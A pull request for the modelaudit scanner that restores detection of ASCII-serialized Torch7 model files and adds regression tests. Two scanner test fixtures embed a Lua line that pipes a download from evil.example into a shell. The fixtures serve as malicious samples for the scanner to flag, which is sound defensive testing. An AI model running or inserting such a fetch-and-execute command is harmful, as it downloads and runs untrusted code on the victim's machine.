### PR TITLE
fix(torch7): restore ASCII serialized routing

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -12,7 +12,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 - avoid repeatedly scanning sharded model families during directory scans
 - keep shard sibling discovery within the requested scan root
 - preserve per-shard metadata when aggregating sharded model families
-- reject plain PyTorch source text from Torch7 content routing
+- distinguish ASCII-serialized Torch7 artifacts from plain PyTorch source text
 
 ## [0.2.45](https://github.com/promptfoo/modelaudit/compare/v0.2.44...v0.2.45) (2026-05-03)
 

--- a/modelaudit/scanners/torch7_scanner.py
+++ b/modelaudit/scanners/torch7_scanner.py
@@ -8,6 +8,7 @@ from pathlib import Path
 from typing import Any, ClassVar
 
 from ..scanner_results import INCONCLUSIVE_SCAN_OUTCOME, mark_inconclusive_scan_result
+from ..utils.file.detection import _is_torch7_signature as is_torch7_signature
 from ._string_extraction import extract_bounded_printable_strings
 from .base import BaseScanner, IssueSeverity, ScanResult
 
@@ -50,20 +51,6 @@ SAFE_REQUIRE_MODULES = frozenset(
         "optim",
     }
 )
-
-
-def is_torch7_signature(prefix: bytes) -> bool:
-    """Return True if the prefix resembles a Torch7 serialization header/marker."""
-    lowered = prefix.lower()
-    if prefix.startswith(b"T7\x00\x00"):
-        return True
-    # Marker-only matches must still look serialized. PyTorch source commonly
-    # mentions both ``torch`` and ``nn.`` and must not route as Torch7.
-    if b"\x00" not in prefix:
-        return False
-    has_torch_marker = b"torch" in lowered or b"luat" in lowered
-    has_structure_marker = b"nn." in lowered or b"tensor" in lowered or b"thnn" in lowered
-    return has_torch_marker and has_structure_marker
 
 
 class Torch7Scanner(BaseScanner):

--- a/modelaudit/utils/file/detection.py
+++ b/modelaudit/utils/file/detection.py
@@ -1097,9 +1097,35 @@ def _is_tensorflow_metagraph_file(path: str) -> bool:
         return False
 
 
+def _has_torch7_ascii_object_signature(prefix: bytes) -> bool:
+    """Return whether text contains a Torch7 ASCII serialized Torch object header."""
+    fields = prefix.splitlines()
+    for offset in range(len(fields) - 5):
+        if fields[offset] != b"4":
+            continue
+        try:
+            object_index = int(fields[offset + 1])
+            version_length = int(fields[offset + 2])
+            class_name_length = int(fields[offset + 4])
+        except ValueError:
+            continue
+
+        version = fields[offset + 3]
+        class_name = fields[offset + 5]
+        if object_index <= 0 or version_length != len(version) or class_name_length != len(class_name):
+            continue
+        if not version.startswith(b"V "):
+            continue
+        if class_name.startswith((b"torch.", b"nn.", b"cunn.", b"cutorch.")):
+            return True
+    return False
+
+
 def _is_torch7_signature(prefix: bytes) -> bool:
     lowered = prefix.lower()
     if prefix.startswith(b"T7\x00\x00"):
+        return True
+    if _has_torch7_ascii_object_signature(prefix):
         return True
     # Marker-only matches must still look serialized. PyTorch source commonly
     # mentions both ``torch`` and ``nn.`` and must not route as Torch7.

--- a/modelaudit/utils/file/detection.py
+++ b/modelaudit/utils/file/detection.py
@@ -1114,7 +1114,7 @@ def _has_torch7_ascii_object_signature(prefix: bytes) -> bool:
         class_name = fields[offset + 5]
         if object_index <= 0 or version_length != len(version) or class_name_length != len(class_name):
             continue
-        if not version.startswith(b"V "):
+        if re.fullmatch(rb"V [+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?", version) is None:
             continue
         if class_name.startswith((b"torch.", b"nn.", b"cunn.", b"cutorch.")):
             return True

--- a/tests/scanners/test_torch7_scanner.py
+++ b/tests/scanners/test_torch7_scanner.py
@@ -38,6 +38,26 @@ def test_can_handle_rejects_pytorch_source_markers(tmp_path: Path) -> None:
     assert not Torch7Scanner.can_handle(str(path))
 
 
+def test_scan_detects_execution_in_ascii_serialized_torch7(tmp_path: Path) -> None:
+    payload = (
+        b"4\n1\n3\nV 1\n13\nnn.Sequential\n"
+        b"4\n2\n3\nV 1\n17\ntorch.FloatTensor\n"
+        b"cmd = os.execute('curl https://evil.example/payload.sh | sh')\n"
+    )
+    path = _write_torch7_file(tmp_path, payload, filename="ascii-malicious.t7")
+
+    assert Torch7Scanner.can_handle(str(path))
+
+    result = Torch7Scanner().scan(str(path))
+    execution_findings = [
+        check
+        for check in result.checks
+        if check.name == "Torch7 Lua Execution Primitive Analysis" and check.status == CheckStatus.FAILED
+    ]
+    assert len(execution_findings) == 1
+    assert execution_findings[0].severity == IssueSeverity.CRITICAL
+
+
 def test_scan_detects_lua_execution_with_network_context(tmp_path: Path) -> None:
     payload = (
         b"T7\x00\x00torch.FloatTensor nn.Sequential\ncmd = os.execute('curl https://evil.example/payload.sh | sh')\n"

--- a/tests/utils/file/test_filetype.py
+++ b/tests/utils/file/test_filetype.py
@@ -385,6 +385,15 @@ def test_torch7_magic_rejects_pytorch_source_markers(tmp_path: Path) -> None:
     assert detect_file_format_from_magic(str(source_path)) == "unknown"
 
 
+def test_torch7_magic_routes_ascii_serialized_models(tmp_path: Path) -> None:
+    torch7_path = tmp_path / "ascii-model.t7"
+    torch7_path.write_bytes(b"4\n1\n3\nV 1\n13\nnn.Sequential\n4\n2\n3\nV 1\n17\ntorch.FloatTensor\n")
+
+    assert detect_file_format(str(torch7_path)) == "torch7"
+    assert detect_file_format_from_magic(str(torch7_path)) == "torch7"
+    assert validate_file_type(str(torch7_path)) is True
+
+
 def test_torch7_magic_keeps_binary_marker_only_routing(tmp_path: Path) -> None:
     torch7_path = tmp_path / "renamed.bin"
     torch7_path.write_bytes(b"\x01\x00torch.FloatTensor nn.Sequential\n")

--- a/tests/utils/file/test_filetype.py
+++ b/tests/utils/file/test_filetype.py
@@ -394,6 +394,13 @@ def test_torch7_magic_routes_ascii_serialized_models(tmp_path: Path) -> None:
     assert validate_file_type(str(torch7_path)) is True
 
 
+def test_torch7_magic_rejects_malformed_ascii_version_header(tmp_path: Path) -> None:
+    source_path = tmp_path / "malformed-header.py"
+    source_path.write_bytes(b"4\n1\n9\nV payload\n13\nnn.Sequential\n")
+
+    assert detect_file_format_from_magic(str(source_path)) == "unknown"
+
+
 def test_torch7_magic_keeps_binary_marker_only_routing(tmp_path: Path) -> None:
     torch7_path = tmp_path / "renamed.bin"
     torch7_path.write_bytes(b"\x01\x00torch.FloatTensor nn.Sequential\n")


### PR DESCRIPTION
## Summary
- restore routing for Torch7 artifacts written using upstream-supported ASCII serialization
- retain plain PyTorch source rejection by requiring a structured ASCII Torch object header with numeric version metadata
- share the Torch7 signature predicate between content detection and the scanner, with positive and negative regressions

## Bug
PR #1255 added a NUL requirement for non-`T7\0\0` Torch7 marker routing to avoid PyTorch-source false positives. Upstream Torch7 supports `torch.save(..., 'ascii')`; these artifacts contain newline-delimited object metadata and raw class names without requiring a NUL byte. Current `main` therefore classifies a supported ASCII-serialized Torch7 model as `unknown` and never applies Torch7 checks.

During follow-up review, the initial patch was tightened to match Torch7's version parsing: headers with non-numeric `V ...` metadata no longer route as Torch7.

Upstream references:
- https://github.com/torch/torch7/blob/master/File.lua
- https://github.com/torch/torch7/blob/master/doc/serialization.md
- https://github.com/torch/torch7/blob/master/lib/TH/THDiskFile.c

## Validation
- Before the primary fix, both new ASCII positive regressions failed: scanner routing returned `False`, and file detection returned `unknown`.
- Before the follow-up tightening, the malformed `V payload` negative regression failed because the file routed as `torch7`.
- `PROMPTFOO_DISABLE_TELEMETRY=1 uv run --no-sync pytest tests/scanners/test_torch7_scanner.py::test_scan_detects_execution_in_ascii_serialized_torch7 tests/scanners/test_torch7_scanner.py::test_can_handle_rejects_pytorch_source_markers tests/utils/file/test_filetype.py::test_torch7_magic_routes_ascii_serialized_models tests/utils/file/test_filetype.py::test_torch7_magic_rejects_pytorch_source_markers -q`
- `uv run --no-sync ruff format modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/`
- `uv run --no-sync ruff check --fix modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/`
- `uv run --no-sync ruff check modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/`
- `uv run --no-sync ruff format --check modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/`
- `uv run --no-sync mypy modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/`
- All-scanner environment: `python -m modelaudit doctor --show-failed` loaded `44/44` scanners; the affected/CLI suite passed on final head (`109 passed`).
- Minimal-environment full non-slow, non-integration lane passed on final head (`4468 passed, 988 skipped`).
- The all-scanner parallel lane reached `5559 passed, 13 skipped` but failed only three local timing thresholds; all three passed when rerun in isolation (`file_fingerprint_performance`, `debug_command_is_fast`, and `directory_scanning_performance`).
